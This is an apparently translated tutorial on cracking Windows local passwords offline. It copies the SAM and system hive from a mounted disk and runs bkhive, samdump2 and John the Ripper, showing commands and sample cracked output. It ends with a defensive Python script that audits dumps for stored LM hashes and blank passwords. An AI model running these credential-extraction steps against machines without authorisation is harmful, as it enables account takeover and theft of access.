Boot into Linux and mount the Windows system partition, then copy the SAM and system files from the C:\WINDOWS\system32\config directory.
You can also use a WinPE or DOS boot disk. You only need to copy SAM and system.
Start cracking:
bkhive system keys -- generate the keys file
samdump2 SAM keys > hashes -- use SAM and keys to generate hashes
john hashes -- run John on the hashes
Tip:
You can also look up a hash online directly at http://www.objectif-securite.ch/en/products.php
I am not in Linux right now. I will write up the details another day, in the text below.
mount -t ntfs /dev/hda1 /mnt/windows
mkdir /home/young001/sam
cp /mnt/windows/WINDOWS/system32/config/SAM /home/young001/sam
cp /mnt/windows/WINDOWS/system32/config/system /home/young001/sam
umount /mnt/windows
cd /home/young001/sam
bkhive system keys
samdump2 SAM keys > hashes
john hashes -- run John on the hashes
At this point the password is found.
Some additional tips:
For example, if the administrator password is 123456, it is shown at the bottom like this:
Administrator:123456:500:e263f50a6a506be3d494d3d62b4dc666
You can also run the following command to view it:
john-1.7.2/run/john --show hashes
Sometimes the password is displayed with several question marks, as shown below:
Administrator:???456:500:e263f50a6a506be3d494d3d62b4dc666:
Run john-1.7.2/run/john --show hashes to check whether the password is complete. If it is still incomplete, the password may not have been completely cracked. In that case, add the --restore parameter to continue cracking from where the previous run stopped (--restore reads the saved session state, so no hash file is passed):
john-1.7.2/run/john --restore
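
The partial result above (question marks for part of the password) appears because the LM hash format splits a password into two independent 7-character halves, which John reports separately. The following Python audit is an added example, not part of the original post: it reads samdump2-style lines (user:rid:lm:nt:::) and reports which accounts still store an LM hash. The sample accounts and their hash values are constructed; only the two empty-password constants are real.

```python
"""Audit a samdump2-style dump for accounts that still store LM hashes."""

# Well-known hashes of the empty password (LM and NT).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM_HALF = EMPTY_LM[:16]  # LM hash of an empty 7-character half


def is_hex32(value):
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value)


def absent(value, empty_constant):
    # samdump2 prints a "NO PASSWORD*..." marker when a hash is not stored.
    return value == empty_constant or value.startswith("no password")


def audit_line(line):
    """Return (user, findings) for one dump line, or None if it is malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    user, lm, nt = parts[0], parts[2].lower(), parts[3].lower()
    findings = []
    if is_hex32(lm) and lm != EMPTY_LM:
        findings.append("LM hash stored")
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("second LM half empty (password of 7 characters or fewer)")
    if absent(lm, EMPTY_LM) and absent(nt, EMPTY_NT):
        findings.append("blank password")
    return user, findings


def audit(text):
    """Map each account name in the dump to its list of findings."""
    parsed = (audit_line(line) for line in text.splitlines())
    return {user: findings for user, findings in filter(None, parsed)}


# Constructed sample input: hash values are placeholders, not real accounts.
SAMPLE = """\
alice:1001:0123456789abcdefaad3b435b51404ee:00112233445566778899aabbccddeeff:::
bob:1002:0123456789abcdeffedcba9876543210:00112233445566778899aabbccddeeff:::
carol:1003:NO PASSWORD*********************:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

if __name__ == "__main__":
    for user, findings in audit(SAMPLE).items():
        print(user, "->", "; ".join(findings) or "no LM hash stored")
```

Accounts reported with "LM hash stored" should have LM hash storage disabled and the password changed, since the old LM hash stays in the SAM until the next password change.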